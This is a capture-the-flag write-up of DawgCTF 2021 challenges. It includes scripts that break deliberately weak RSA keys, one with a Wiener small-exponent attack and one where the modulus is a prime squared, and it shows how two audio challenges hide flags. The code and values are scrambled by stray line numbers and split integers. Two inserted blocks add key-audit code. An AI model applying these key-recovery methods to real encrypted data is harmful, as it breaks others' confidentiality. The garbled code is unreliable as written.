DawgCTF 2021 Writeups

Howdy! We recently participated in DawgCTF 2021 and placed 41st out of 595 teams that scored 5 points or more.
Here are some of my writeups and those of some of my teammates. Enjoy!
Crypto
Really Secure Algorithm
Points : 150
Challenge Description
I like my e’s like I like my trucks: big and obnoxious
Author: trashcanna
Solution
We are given the following values:
1n: 1063494238636905330671898279123020701722241177838742822812173978727720269828464796177466331816675300997219760473399150899338190503499441304612339501295713174906319744094945565844664372365921409430229356934682156557249826723147031652843433859344718768493183522524995480377138743798310313783408725321419870843554822150601536373735923419276343616677440442774544203945706641152517137477442684440329779076981535293867470891276594740058202983415251883426242386508849130959905432961654910957147313116759921173654729071152981682554792584462863534617943384988632032130835087976957452863581161399454295389753849954195624356779281196493728732643445649356033158461867533398892265000228558146288424480232820613034689816560319929705959290376265550914058448343308161173100473161643834475548888676356572581129193395124610558172636505697071928778350452726229098387020587814634712035171712313035012109421792643188405752849278190287414108308734638519593282032082768153331276317440224645157072560878195004847185217741752846484430459047014205368551175641186962966731731946128786111994668528579102737764964521437485037695161775036622411218739549286577109028626220150452705854596994751235894610227300222070678106023292138580496517177268042770934391185798181598618563332872419401223903806812404310665174941843727792999745655534108889130325189241267039092501129173520194489329592776789648244263220437261594447066833175026748830694496235756029688061559449109400248449366143822446893851310444152168531390880512280359096438303124398155397910138799660941243464476642041104225318910175143988510614445494598098558426300612294667831401095538851181871031466580808942102239297182977785401087460226345045290147371931284725756179151791539310603340196586480494033673522637677423221202352493653286430691931273676649062037570851083535722738207802574643773975006788646467981693396925922930573766914743566111012462215653872417726475122775377641591778444141816733462035690735543990556767891443301312941168828619850007793197693295002346977
318117653857994731382292035666024397790972920502626243999541832942059274728220802530163223188484361653845185336386588669397688474323385816925410493569923865462650449548121898936835205060632513390578074550881170405889665319159308800795056447244869407145217360018494614236328487464266591617854909647808315406639117270321158016494893469025866752746911948790708005075752364953010067274475470453957941422189404716860354111166203043679764568407375052809648827400302926099178569
2e: 3220802065182560914438995332978385828069034621892126234924595295273983628535788077233317488920912814764896916743223968258935689817311865971756578514609646920835872242318303045957532002769153533884403239736967231771200078666615109119344233522165861060313970021275191638581071927661286657005409858144435112740044696951289271724549762197871467065629543926983150269492573225294413490297832281671811587443568285754601142726759523881303448741751953938812486617533428883003689694704775411528884082566832510281100057411726367762796194836687236605120261123658005390355385006359042817027334751273391403857140065601530716102797803030188483723253595987392839681388163331257642534033257730026076529138824840789027758271690484010313932639551666952178414000178559797243172258722945314924516242470328095240827142810438731274618320513835112987968203694533589608241626843627419386040842104356230993286220284197102903256833803787260850071589039829329122143141582239212197247597172661362467038304469933099805950731100018044830583394614124606939114164307285584950488735976859420895313737345786383497389300869100380030882949409426920309980470413931527475262780885742387550274740192655390545274914017571650115054705826479004014922734028477031701628472591591613190949107536598321479649690522968595617692988258815937535921217088970357288737951594759267498069987378125018686655139466663529414970866518185538716064172813525992346881835472126753536260231514269826406644741363773741100235324811015658703598466217483263495164679386141558344626390615923902664511699712500104914973790738687861068215704482531820429062406828330677834095747354007393293118100530945308114770029734644326517558112461515090112878580772982959879549158891991003286957302330962269125263291444781981210964893960838761295425166029698669613764236856477678856805597570942085741244114960172910602283889495560652353338021428655578449135352765725352826714040202377634055584770201529101050190083642373153300476052573806963678714172072548339790643426506641813090
67142909106945469319731754805506564282047041605728503555870882010025649797753726253285119740979484849951129514070748168270413416940958393138417596025358589062839735425553556206423183484639265605269615685651949641759227283257819425264608389110223455267792764547470141745830149226062457331548317230637497633273069300415564503833751637575125936072041989787691982221885384446295804003751739608564016981200019839941768866474797817202494560129096305497153712068566001154013937
3c: 3298892785780440168243137415277052296248263543801131998518377645637468722338070211136933717780727470233031936613912569176546735797489836191012293377769955749891015252955786329819187772320382226799492643721674189810385191643590461933977948335756922948382709191372125035946447568848799051023820136167167957660558063806750791221932619372021527273723070351977026714070089339067235801588438969391608898818749459764238294148777352696907277113478726158640846276319564031773381857801007785645489768842990864534217251634280179089493259669045302910690255840970226958165116265894852576156645327741945558090177636221977281564536800593008082774715584508180043847517461903179105017726712191175147465840459280564879041127208011766098897401732881300737886870105442202508143784672496112439536908314065234559606399570299378197753985612285994675367150209541369702831376886134861093708835472183141631196138107642593349332094350789268567474039335786857242710759881362689675208080253390018636141930920751069958113551162137780570372566257292380400208100962669173942136173199140262910933098974835573176256961332980133267466296732655584681356026906747049399101723385560359678401572288599977652192410955517582538893126106919564459846575350825464604203498083727023078076970377786685857203186402463342166500543530365053015503876200891443313830767916049441715311218610098728070225699714250348879553932074450865875289726317821042616106252269824847989156955324926668226491056808687825545012468181568150435348572040780577486072898223874625293736835116722707084742730785741536492636669272684135209841912650866477289126924186090933251948261618694282701382094302157392901816175797459396393926084985964002740141034357474622620455866246131099709547624452476281870317743936392866892014499706462885609969694561455182907323757837799506019012687518883742476348043460900707622028093124217255379380597231488317453847659618753599177547085702629093237749737281017350464893851168390981549057612895650306609328588394024576847046058947019392265
86411257561719440368089980555960049063794123068432799043630558103308335378100690170353973384441557259766075780510887009923794374174414344793891145106172614982174022423725641446878993111773629101974963001417653742183922637679467704643683488299451383820099923197374567580088833681469257525555566554059017269673597621231456370183587051700138951722854738823417346171701112221512801669470086625272428387110466009926633732340715338158014022960380535876415340423270463298180055
The very large e hints at a small private exponent d, which makes the key vulnerable to Wiener's attack. We can use this script to decrypt the encrypted flag:
"""
MxRy - 2016 - Wiener's attack
useful link : http://math.unice.fr/~walter/L1_Arith/cours2.pdf
"""
## get the exploit on https://raw.githubusercontent.com/MxRy/rsa-attacks/master/wiener-attack.py
import math

# Partial quotients of the continued fraction expansion of num/denum
def DevContinuedFraction(num, denum) :
    partialQuotients = []
    divisionRests = []
    for i in range(int(math.log(denum, 2)/1)) :
        divisionRests = num % denum
        partialQuotients.append(num // denum)
        num = denum
        denum = divisionRests
        if denum == 0 :
            break
    return partialQuotients

""" (cf. useful link p.2) Theorem :
p_-2 = 0 p_-1 = 1 p_n = a_n.p_n-1 + p_n-2
q_-2 = 1 q_-1 = 0 q_n = a_n.q_n-1 + q_n-2
"""
def DivergentsComputation(partialQuotients) :
    (p1, p2, q1, q2) = (1, 0, 0, 1)
    convergentsList = []
    for q in partialQuotients :
        pn = q * p1 + p2
        qn = q * q1 + q2
        convergentsList.append([pn, qn])
        p2 = p1
        q2 = q1
        p1 = pn
        q1 = qn
    return convergentsList

"""
https://dzone.com/articles/cryptographic-functions-python
Be careful to physical attacks see sections below
"""
def SquareAndMultiply(base,exponent,modulus):
    binaryExponent = []
    while exponent != 0:
        binaryExponent.append(exponent%2)
        exponent = exponent//2
    result = 1
    binaryExponent.reverse()
    for i in binaryExponent:
        if i == 0:
            result = (result*result) % modulus
        else:
            result = (result*result*base) % modulus
    return result

# Each convergent k/d is tested by encrypting a known value and decrypting it with the candidate d
def WienerAttack(e, N, C) :
    testStr = 42
    C = SquareAndMultiply(testStr, e, N)
    for c in DivergentsComputation(DevContinuedFraction(e, N)) :
        if SquareAndMultiply(C, c[1], N) == testStr :
            FullReverse(N, e, c)
            return c[1]
    return -1

"""
Credit for int2Text :
https://jhafranco.com/2012/01/29/rsa-implementation-in-python/
"""
def GetTheFlag(C, N, d) :
    p = pow(C, d, N)
    print p
    size = len("{:02x}".format(p)) // 2
    print "Flag = "+"".join([chr((p >> j) & 0xff) for j in reversed(range(0, size << 3, 8))])

"""
http://stackoverflow.com/questions/356090/how-to-compute-the-nth-root-of-a-very-big-integer
"""
def find_invpow(x,n):
    high = 1
    while high ** n < x:
        high *= 2
    low = high//2
    while low < high:
        mid = (low + high) // 2
        if low < mid and mid**n < x:
            low = mid
        elif high > mid and mid**n > x:
            high = mid
        else:
            return mid
    return mid + 1

"""
Following the proof, we look for (p, q) by finding the roots of the
second-degree polynomial : x^2 - (N - phi(N) + 1)x + N
"""
def FullReverse(N, e, c) :
    phi = (e*c[1]-1)//c[0]
    a = 1
    b = -(N-phi+1)
    c = N
    delta =b*b - 4*a*c
    if delta > 0 :
        x1 = (-b + find_invpow((b*b - 4*a*c), 2))//(2*a)
        x2 = (-b - find_invpow((b*b - 4*a*c), 2))//(2*a)
        if x1*x2 == N :
            print "p = "+str(x1)
            print "q = "+str(x2)
        else :
            print "** Error **"
    else :
        print "** ERROR : (p, q)**"

"""
If N, e, C are in hex ::> int("0x0123456789ABCDEF".strip("0x"), 16)
"""
if __name__ == "__main__":
117 C = 329889278578044016824313741527705229624826354380113199851837764563746872233807021113693371778072747023303193661391256917654673579748983619101229337776995574989101525295578632981918777232038222679949264372167418981038519164359046193397794833575692294838270919137212503594644756884879905102382013616716795766055806380675079122193261937202152727372307035197702671407008933906723580158843896939160889881874945976423829414877735269690727711347872615864084627631956403177338185780100778564548976884299086453421725163428017908949325966904530291069025584097022695816511626589485257615664532774194555809017763622197728156453680059300808277471558450818004384751746190317910501772671219117514746584045928056487904112720801176609889740173288130073788687010544220250814378467249611243953690831406523455960639957029937819775398561228599467536715020954136970283137688613486109370883547218314163119613810764259334933209435078926856747403933578685724271075988136268967520808025339001863614193092075106995811355116213778057037256625729238040020810096266917394213617319914026291093309897483557317625696133298013326746629673265558468135602690674704939910172338556035967840157228859997765219241095551758253889312610691956445984657535082546460420349808372702307807697037778668585720318640246334216650054353036505301550387620089144331383076791604944171531121861009872807022569971425034887955393207445086587528972631782104261610625226982484798915695532492666822649105680868782554501246818156815043534857204078057748607289822387462529373683511672270708474273078574153649263666927268413520984191265086647728912692418609093325194826161869428270138209430215739290181617579745939639392608498596400274014103435747462262045586624613109970954762445247628187031774393639286689201449970646288560996969456145518290732375783779950601901268751888374247634804346090070762202809312421725537938059723148831745384765961875359917754708570262909323774973728101735046489385116839098154905761289565030660932858839402457684704605894701939
226586411257561719440368089980555960049063794123068432799043630558103308335378100690170353973384441557259766075780510887009923794374174414344793891145106172614982174022423725641446878993111773629101974963001417653742183922637679467704643683488299451383820099923197374567580088833681469257525555566554059017269673597621231456370183587051700138951722854738823417346171701112221512801669470086625272428387110466009926633732340715338158014022960380535876415340423270463298180055
118 e = 322080206518256091443899533297838582806903462189212623492459529527398362853578807723331748892091281476489691674322396825893568981731186597175657851460964692083587224231830304595753200276915353388440323973696723177120007866661510911934423352216586106031397002127519163858107192766128665700540985814443511274004469695128927172454976219787146706562954392698315026949257322529441349029783228167181158744356828575460114272675952388130344874175195393881248661753342888300368969470477541152888408256683251028110005741172636776279619483668723660512026112365800539035538500635904281702733475127339140385714006560153071610279780303018848372325359598739283968138816333125764253403325773002607652913882484078902775827169048401031393263955166695217841400017855979724317225872294531492451624247032809524082714281043873127461832051383511298796820369453358960824162684362741938604084210435623099328622028419710290325683380378726085007158903982932912214314158223921219724759717266136246703830446993309980595073110001804483058339461412460693911416430728558495048873597685942089531373734578638349738930086910038003088294940942692030998047041393152747526278088574238755027474019265539054527491401757165011505470582647900401492273402847703170162847259159161319094910753659832147964969052296859561769298825881593753592121708897035728873795159475926749806998737812501868665513946666352941497086651818553871606417281352599234688183547212675353626023151426982640664474136377374110023532481101565870359846621748326349516467938614155834462639061592390266451169971250010491497379073868786106821570448253182042906240682833067783409574735400739329311810053094530811477002973464432651755811246151509011287858077298295987954915889199100328695730233096226912526329144478198121096489396083876129542516602969866961376423685647767885680559757094208574124411496017291060228388949556065235333802142865557844913535276572535282671404020237763405558477020152910105019008364237315330047605257380696367871417207254833979064342650664181
309067142909106945469319731754805506564282047041605728503555870882010025649797753726253285119740979484849951129514070748168270413416940958393138417596025358589062839735425553556206423183484639265605269615685651949641759227283257819425264608389110223455267792764547470141745830149226062457331548317230637497633273069300415564503833751637575125936072041989787691982221885384446295804003751739608564016981200019839941768866474797817202494560129096305497153712068566001154013937
119 N = 106349423863690533067189827912302070172224117783874282281217397872772026982846479617746633181667530099721976047339915089933819050349944130461233950129571317490631974409494556584466437236592140943022935693468215655724982672314703165284343385934471876849318352252499548037713874379831031378340872532141987084355482215060153637373592341927634361667744044277454420394570664115251713747744268444032977907698153529386747089127659474005820298341525188342624238650884913095990543296165491095714731311675992117365472907115298168255479258446286353461794338498863203213083508797695745286358116139945429538975384995419562435677928119649372873264344564935603315846186753339889226500022855814628842448023282061303468981656031992970595929037626555091405844834330816117310047316164383447554888867635657258112919339512461055817263650569707192877835045272622909838702058781463471203517171231303501210942179264318840575284927819028741410830873463851959328203208276815333127631744022464515707256087819500484718521774175284648443045904701420536855117564118696296673173194612878611199466852857910273776496452143748503769516177503662241121873954928657710902862622015045270585459699475123589461022730022207067810602329213858049651717726804277093439118579818159861856333287241940122390380681240431066517494184372779299974565553410888913032518924126703909250112917352019448932959277678964824426322043726159444706683317502674883069449623575602968806155944910940024844936614382244689385131044415216853139088051228035909643830312439815539791013879966094124346447664204110422531891017514398851061444549459809855842630061229466783140109553885118187103146658080894210223929718297778540108746022634504529014737193128472575617915179153931060334019658648049403367352263767742322120235249365328643069193127367664906203757085108353572273820780257464377397500678864646798169339692592293057376691474356611101246221565387241772647512277537764159177844414181673346203569073554399055676789144330131294116882861985000779319769329500234
6977318117653857994731382292035666024397790972920502626243999541832942059274728220802530163223188484361653845185336386588669397688474323385816925410493569923865462650449548121898936835205060632513390578074550881170405889665319159308800795056447244869407145217360018494614236328487464266591617854909647808315406639117270321158016494893469025866752746911948790708005075752364953010067274475470453957941422189404716860354111166203043679764568407375052809648827400302926099178569
    print "e : "+str(e)
    print "N : "+str(N)
    print "C : "+str(C)
    d = WienerAttack(e, N, C)
    if d != -1 :
        print "d = "+str(d)
        GetTheFlag(C, N, d)
    else :
        print "** ERROR : Wiener's attack Impossible**"
We edited the values of C, e and N to those of the challenge in question. Running the script gives us the flag:
┌─[✗]─[user@parrot]─[~/Downloads/CTFS/Writeups]
└──╼ $python2 wiener-attack.py
3e : 322080206518256091443899533297838582806903462189212623492459529527398362853578807723331748892091281476489691674322396825893568981731186597175657851460964692083587224231830304595753200276915353388440323973696723177120007866661510911934423352216586106031397002127519163858107192766128665700540985814443511274004469695128927172454976219787146706562954392698315026949257322529441349029783228167181158744356828575460114272675952388130344874175195393881248661753342888300368969470477541152888408256683251028110005741172636776279619483668723660512026112365800539035538500635904281702733475127339140385714006560153071610279780303018848372325359598739283968138816333125764253403325773002607652913882484078902775827169048401031393263955166695217841400017855979724317225872294531492451624247032809524082714281043873127461832051383511298796820369453358960824162684362741938604084210435623099328622028419710290325683380378726085007158903982932912214314158223921219724759717266136246703830446993309980595073110001804483058339461412460693911416430728558495048873597685942089531373734578638349738930086910038003088294940942692030998047041393152747526278088574238755027474019265539054527491401757165011505470582647900401492273402847703170162847259159161319094910753659832147964969052296859561769298825881593753592121708897035728873795159475926749806998737812501868665513946666352941497086651818553871606417281352599234688183547212675353626023151426982640664474136377374110023532481101565870359846621748326349516467938614155834462639061592390266451169971250010491497379073868786106821570448253182042906240682833067783409574735400739329311810053094530811477002973464432651755811246151509011287858077298295987954915889199100328695730233096226912526329144478198121096489396083876129542516602969866961376423685647767885680559757094208574124411496017291060228388949556065235333802142865557844913535276572535282671404020237763405558477020152910105019008364237315330047605257380696367871417207254833979064342650664181309
067142909106945469319731754805506564282047041605728503555870882010025649797753726253285119740979484849951129514070748168270413416940958393138417596025358589062839735425553556206423183484639265605269615685651949641759227283257819425264608389110223455267792764547470141745830149226062457331548317230637497633273069300415564503833751637575125936072041989787691982221885384446295804003751739608564016981200019839941768866474797817202494560129096305497153712068566001154013937
4N : 106349423863690533067189827912302070172224117783874282281217397872772026982846479617746633181667530099721976047339915089933819050349944130461233950129571317490631974409494556584466437236592140943022935693468215655724982672314703165284343385934471876849318352252499548037713874379831031378340872532141987084355482215060153637373592341927634361667744044277454420394570664115251713747744268444032977907698153529386747089127659474005820298341525188342624238650884913095990543296165491095714731311675992117365472907115298168255479258446286353461794338498863203213083508797695745286358116139945429538975384995419562435677928119649372873264344564935603315846186753339889226500022855814628842448023282061303468981656031992970595929037626555091405844834330816117310047316164383447554888867635657258112919339512461055817263650569707192877835045272622909838702058781463471203517171231303501210942179264318840575284927819028741410830873463851959328203208276815333127631744022464515707256087819500484718521774175284648443045904701420536855117564118696296673173194612878611199466852857910273776496452143748503769516177503662241121873954928657710902862622015045270585459699475123589461022730022207067810602329213858049651717726804277093439118579818159861856333287241940122390380681240431066517494184372779299974565553410888913032518924126703909250112917352019448932959277678964824426322043726159444706683317502674883069449623575602968806155944910940024844936614382244689385131044415216853139088051228035909643830312439815539791013879966094124346447664204110422531891017514398851061444549459809855842630061229466783140109553885118187103146658080894210223929718297778540108746022634504529014737193128472575617915179153931060334019658648049403367352263767742322120235249365328643069193127367664906203757085108353572273820780257464377397500678864646798169339692592293057376691474356611101246221565387241772647512277537764159177844414181673346203569073554399055676789144330131294116882861985000779319769329500234697
7318117653857994731382292035666024397790972920502626243999541832942059274728220802530163223188484361653845185336386588669397688474323385816925410493569923865462650449548121898936835205060632513390578074550881170405889665319159308800795056447244869407145217360018494614236328487464266591617854909647808315406639117270321158016494893469025866752746911948790708005075752364953010067274475470453957941422189404716860354111166203043679764568407375052809648827400302926099178569
5C : 329889278578044016824313741527705229624826354380113199851837764563746872233807021113693371778072747023303193661391256917654673579748983619101229337776995574989101525295578632981918777232038222679949264372167418981038519164359046193397794833575692294838270919137212503594644756884879905102382013616716795766055806380675079122193261937202152727372307035197702671407008933906723580158843896939160889881874945976423829414877735269690727711347872615864084627631956403177338185780100778564548976884299086453421725163428017908949325966904530291069025584097022695816511626589485257615664532774194555809017763622197728156453680059300808277471558450818004384751746190317910501772671219117514746584045928056487904112720801176609889740173288130073788687010544220250814378467249611243953690831406523455960639957029937819775398561228599467536715020954136970283137688613486109370883547218314163119613810764259334933209435078926856747403933578685724271075988136268967520808025339001863614193092075106995811355116213778057037256625729238040020810096266917394213617319914026291093309897483557317625696133298013326746629673265558468135602690674704939910172338556035967840157228859997765219241095551758253889312610691956445984657535082546460420349808372702307807697037778668585720318640246334216650054353036505301550387620089144331383076791604944171531121861009872807022569971425034887955393207445086587528972631782104261610625226982484798915695532492666822649105680868782554501246818156815043534857204078057748607289822387462529373683511672270708474273078574153649263666927268413520984191265086647728912692418609093325194826161869428270138209430215739290181617579745939639392608498596400274014103435747462262045586624613109970954762445247628187031774393639286689201449970646288560996969456145518290732375783779950601901268751888374247634804346090070762202809312421725537938059723148831745384765961875359917754708570262909323774973728101735046489385116839098154905761289565030660932858839402457684704605894701939226
586411257561719440368089980555960049063794123068432799043630558103308335378100690170353973384441557259766075780510887009923794374174414344793891145106172614982174022423725641446878993111773629101974963001417653742183922637679467704643683488299451383820099923197374567580088833681469257525555566554059017269673597621231456370183587051700138951722854738823417346171701112221512801669470086625272428387110466009926633732340715338158014022960380535876415340423270463298180055
** ERROR : (p, q)**
d = 69767
28130199971861643353837435624382872621577661176756651036349642109
Flag = DawgCTF{sm@ll_d_b1g_dr3am5}
Flag : DawgCTF{sm@ll_d_b1g_dr3am5}
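Added example, not part of the original writeup or of MxRy's script: a Python 3 key audit that runs the same continued-fraction test to tell whether a public key (n, e) has a private exponent small enough for Wiener's attack, and that factors n with an exact integer square root when it does. The function names and the toy key (twin primes 10^9+7 and 10^9+9, d = 8191) are constructed for illustration.

```python
from math import isqrt


def convergents(num, den):
    """Yield the convergents (h, k) of the continued fraction of num/den."""
    h_prev, h = 0, 1  # numerators   h_{-2}, h_{-1}
    k_prev, k = 1, 0  # denominators k_{-2}, k_{-1}
    while den:
        a, rem = divmod(num, den)
        h_prev, h = h, a * h + h_prev
        k_prev, k = k, a * k + k_prev
        yield h, k
        num, den = den, rem


def wiener_recover(n, e):
    """Return (d, p, q) if some convergent k/d of e/n reveals phi(n), else None."""
    for k, d in convergents(e, n):
        if k == 0 or (e * d - 1) % k:
            continue                      # e*d - 1 must be an exact multiple of k
        phi = (e * d - 1) // k            # candidate phi(n)
        s = n - phi + 1                   # equals p + q when phi is correct
        disc = s * s - 4 * n              # equals (p - q)^2 when phi is correct
        if disc < 0:
            continue
        r = isqrt(disc)
        if r * r != disc or (s + r) % 2:
            continue                      # roots of x^2 - s*x + n are not integers
        p, q = (s + r) // 2, (s - r) // 2
        if q > 1 and p * q == n:
            return d, p, q
    return None


def wiener_bound(n):
    """Largest d covered by Wiener's theorem, floor(n^(1/4)) // 3."""
    return isqrt(isqrt(n)) // 3


def audit_key(n, e):
    """Summarise whether the public key (n, e) falls to the test above."""
    hit = wiener_recover(n, e)
    return {
        "wiener_bound": wiener_bound(n),
        "weak": hit is not None,
        "d": hit[0] if hit else None,
        "factors": hit[1:] if hit else None,
    }


# Constructed toy key (not the challenge key): twin primes 10^9+9 and 10^9+7.
P, Q = 1_000_000_009, 1_000_000_007
N = P * Q
PHI = (P - 1) * (Q - 1)
WEAK_D = 8191                    # chosen first, below wiener_bound(N)
WEAK_E = pow(WEAK_D, -1, PHI)    # the small d forces an e about as large as N
SAFE_E = 65537                   # usual keygen: fix e, derive a full-size d

if __name__ == "__main__":
    for label, e in (("small d", WEAK_E), ("e = 65537", SAFE_E)):
        print(label, audit_key(N, e))
```

Keys generated the usual way (a fixed small e with d derived from it) end up with d about the size of phi(n), far above the bound reported by wiener_bound, so the audit returns no hit for them.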
The Obligatory RSA Challenge
Points 200
Description
Would you believe last year someone complained because we didn’t have any RSA challenges?
Author: trashcanna
Solution
Yet another RSA challenge:
1n = 475949103910858550021125990924158849158697270648919661828320221786290971910801162715741857913263841305791340620183586047714776121441772996725204443295179887266030140253810088374694440549840736495636788558700921470022460434066253254392608133925706614740652788148941399543678467908310542011120056872547434605870421155328267921959528599997665673446885264987610889953501339256839810594999040236799426397622242067047880689646122710665080146992099282095339487080392261213074797358333223941498774483959648045020851532992076627047052728717413962993083433168342883663806239435330220440022810109411458433074000776611396383445744445358833608257489996609945267087162284574007467260111258273237340835062232433554776646683627730708184859379487925275044556485814813002091723278950093183542623267574653922976836227138288597533966685659873510636714530467992896001651744874195741686965980241950250826962186888426335553052644834563667046655173614036106867858602780687612991191030530253828632354662026863532605714273940100720042141793891322151633985026545935269398026536029250450509019273191619994794225225837195941413997081931530563686314944827757612844439598729054246326818359094052377829969668199706378215473562124250809041972492524806233512261976041
e = 65537
3c = 402152770613351738677048755708324474554170176764376236321890073753918413309501149040535095814748232081435325267703210634002909644227960630174709988528642707754801508241021668904011536073077213912653767687757898322382171898337974911700337832550299932085103965369544431307577718773533194882182023481111058393084914882624811257799702110086578537559675833661097129217671283819819802719020785020449340858391080587707215652771744641811550418602816414116540750903339669304799230376985830812200326676840611164703480548721567059811144937314764079780635943387160912954258110357655610465371113884532394048454506662310124118115282815379922723111955622863507979527460353779351769204461491799016534724821436662464400182076767643570270346372132221638470790194373337215168535861219992353368908816850146790012604023887493693793270280077392301335013736929937492555191042177475011094313978657365706039774511145223613781837484571546154539993982179172011867034689022507760853121804219571982660393205589671062476958539437099789304135763092469236641459611160765143625998223459045923936551054351546033776966693997323972592968414107451804594097481574453747907874383069514662912314790514989026350766602740419907710031860078783498791071782013064557781230616536
Given n, e and c, we can use factordb.com to factor n,
which gives us the value of p.
We wrote a simple Python exploit:
from Crypto.Util.number import inverse
import binascii

4n = 475949103910858550021125990924158849158697270648919661828320221786290971910801162715741857913263841305791340620183586047714776121441772996725204443295179887266030140253810088374694440549840736495636788558700921470022460434066253254392608133925706614740652788148941399543678467908310542011120056872547434605870421155328267921959528599997665673446885264987610889953501339256839810594999040236799426397622242067047880689646122710665080146992099282095339487080392261213074797358333223941498774483959648045020851532992076627047052728717413962993083433168342883663806239435330220440022810109411458433074000776611396383445744445358833608257489996609945267087162284574007467260111258273237340835062232433554776646683627730708184859379487925275044556485814813002091723278950093183542623267574653922976836227138288597533966685659873510636714530467992896001651744874195741686965980241950250826962186888426335553052644834563667046655173614036106867858602780687612991191030530253828632354662026863532605714273940100720042141793891322151633985026545935269398026536029250450509019273191619994794225225837195941413997081931530563686314944827757612844439598729054246326818359094052377829969668199706378215473562124250809041972492524806233512261976041
e = 65537
6c = 402152770613351738677048755708324474554170176764376236321890073753918413309501149040535095814748232081435325267703210634002909644227960630174709988528642707754801508241021668904011536073077213912653767687757898322382171898337974911700337832550299932085103965369544431307577718773533194882182023481111058393084914882624811257799702110086578537559675833661097129217671283819819802719020785020449340858391080587707215652771744641811550418602816414116540750903339669304799230376985830812200326676840611164703480548721567059811144937314764079780635943387160912954258110357655610465371113884532394048454506662310124118115282815379922723111955622863507979527460353779351769204461491799016534724821436662464400182076767643570270346372132221638470790194373337215168535861219992353368908816850146790012604023887493693793270280077392301335013736929937492555191042177475011094313978657365706039774511145223613781837484571546154539993982179172011867034689022507760853121804219571982660393205589671062476958539437099789304135763092469236641459611160765143625998223459045923936551054351546033776966693997323972592968414107451804594097481574453747907874383069514662912314790514989026350766602740419907710031860078783498791071782013064557781230616536
7p = 21816257788879800226266741950501282709401872894176288619472731956291218914324742537604641219560786978413613510633536886641581153942571579359519401327796021367732695476711467566761398025402445133259848384123905962932802004021079944067083532491720877926448099933753336517689984808846750048960375488528766110009254176926887611598941876012437215971816681184483796662759984833863168641346915636162467824574775331116852844756225674938392321848711476249893809700776552828990831593983374320915711192051109410295925205263499219444742867868898381959251178728127024835656647566724333855154762699836449704050690295585931350731821
8
9phi = pow(p,2) - p
10d = inverse(e,phi)
11m = pow(c,d,n)
12print(bytes.fromhex(hex(m)[2:]))
Running it, we get our flag:
┌─[user@parrot]─[~/Desktop/CTFs/DawgCTF]
└──╼ $python rsanot.py
b'DawgCTF{wh0_n33ds_Q_@nyw@y}'
Flag : DawgCTF{wh0_n33ds_Q_@nyw@y}
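The line phi = pow(p,2) - p in the script is Euler's totient for a modulus that is the square of one prime, phi(p^2) = p(p - 1). The added example below (not part of the original writeup) shows the integer-square-root test a key-validation routine can use to reject such a modulus, and why the two-prime formula (p - 1)(q - 1) gives the wrong private exponent here; the Mersenne prime and the message are constructed test values.

```python
from math import isqrt

E = 65537


def prime_square_root(n):
    """Return r if n == r*r, else None. Primality of r is assumed, not checked."""
    r = isqrt(n)
    return r if r * r == n else None


def decrypt_square_modulus(c, e, n):
    """Decrypt RSA ciphertext c when n is the square of a single prime."""
    p = prime_square_root(n)
    if p is None:
        raise ValueError("n is not a perfect square")
    phi = p * p - p                 # phi(p^2) = p(p - 1), i.e. pow(p,2) - p
    d = pow(e, -1, phi)             # modular inverse (Python 3.8+)
    return pow(c, d, n)


def decrypt_with_pq_formula(c, e, n):
    """Same computation with the two-prime formula (p-1)(q-1), q = p: wrong."""
    p = prime_square_root(n)
    d = pow(e, -1, (p - 1) * (p - 1))
    return pow(c, d, n)


# Constructed demo values: 2**127 - 1 is a known Mersenne prime.
P = 2**127 - 1
N = P * P
MESSAGE = b"constructed-msg"
M = int.from_bytes(MESSAGE, "big")
C = pow(M, E, N)

if __name__ == "__main__":
    recovered = decrypt_square_modulus(C, E, N)
    print(recovered.to_bytes((recovered.bit_length() + 7) // 8, "big"))
    print("two-prime formula recovers message:",
          decrypt_with_pq_formula(C, E, N) == M)
```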
Audio/Radio
Third Eye
points 75
Description
This beat is making me see things that I didn’t think I could see…
Author: Noodle
Solution
Opening the audio in Sonic Visualiser and adding a spectrogram, we can see some numbers; zooming out, they become clear. We extracted the readable numbers, converted them from hex, and got our flag.

hex : 44 61 77 67 43 54 46 7b 73 79 6e 33 73 74 68 33 73 31 61 63 73 7d
Flag : DawgCTF{syn3sth3s1acs}
Tag, You’re It!
points 100
Description
Keeping your music library labeled and organized is like a full time job sometimes.
Author: Noodle
Solution
The flag was hidden in the audio metadata as a comment; we can extract it using exiftool:
┌─[✗]─[skoki@parrot]─[~/Desktop/CTFs/DawgCTF]
└──╼ $exiftool retaliate.mp3
ExifTool Version Number : 11.16
File Name : retaliate.mp3
Directory : .
File Size : 2.8 MB
File Modification Date/Time : 2021:05:08 17:12:10+00:00
File Access Date/Time : 2021:05:08 17:16:36+00:00
File Inode Change Date/Time : 2021:05:08 17:16:02+00:00
File Permissions : rw-r--r--
File Type : MP3
File Type Extension : mp3
MIME Type : audio/mpeg
MPEG Audio Version : 1
Audio Layer : 3
Audio Bitrate : 128 kbps
Sample Rate : 44100
Channel Mode : Joint Stereo
MS Stereo : On
Intensity Stereo : Off
Copyright Flag : False
Original Media : True
Emphasis : None
Encoder : LAME3.99r
Lame VBR Quality : 4
Lame Quality : 3
Lame Method : CBR
Lame Low Pass Filter : 17 kHz
Lame Bitrate : 128 kbps
Lame Stereo Mode : Joint Stereo
ID3 Size : 19325
Picture Format : JPG
Picture Type : Other
Picture Description :
Picture : (Binary data 9063 bytes, use -b option to extract)
Title : RETALIATE
Artist : Sam Gellaitry, Connor Pearson
Band : Sam Gellaitry, Connor Pearson
Composer : Sam Gellaitry
Album : RETALIATE (single)
Track : 1/1
Part Of Set : 1/1
Year : 2015
Beats Per Minute : 120
Genre : Unclassifiable
Lyrics : [Verse 1].I don't know what's going on.I'm feeling weak, but I feel so strong.And I won't fight, and I won't run.Don't need a knife, I need a gun.[Bridge].Don't need a knife, I need a gun.[Chorus].Retaliate, retaliate.Retaliate, retaliate.Retaliate, retaliate.[Syllabic improvisation].[Outro].Retaliate.Retaliate.Retaliate.[Syllabic improvisation].[DogeCTF{wr0te_0ut_th3s3_1yrics_by_hand_1ma0}]
